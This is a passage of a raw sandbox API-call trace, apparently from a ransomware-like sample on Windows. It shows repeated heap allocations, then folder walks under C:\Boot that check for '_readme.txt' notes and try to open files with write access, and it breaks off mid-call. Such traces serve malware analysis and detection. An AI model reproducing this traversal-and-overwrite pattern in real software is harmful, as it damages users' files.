RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.247] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.248] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.249] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.250] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.251] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0058.251] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.251] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.251] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.251] PathFindFileNameW (pszPath="") returned="" [0058.251] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.251] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.251] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.252] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.252] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0058.252] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0058.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.252] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.252] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.252] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.252] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0058.252] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.252] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.252] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned=".txt" [0058.252] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.252] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.253] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.253] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.253] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.253] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0058.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.253] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.253] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.253] PathFindFileNameW (pszPath="") returned="" [0058.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.253] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.253] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.253] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0058.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.254] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.254] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0058.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.254] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0058.254] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.254] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.254] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.254] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0058.254] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.254] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec504f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.254] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.254] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned=".txt" [0058.254] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec504f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.254] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.255] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 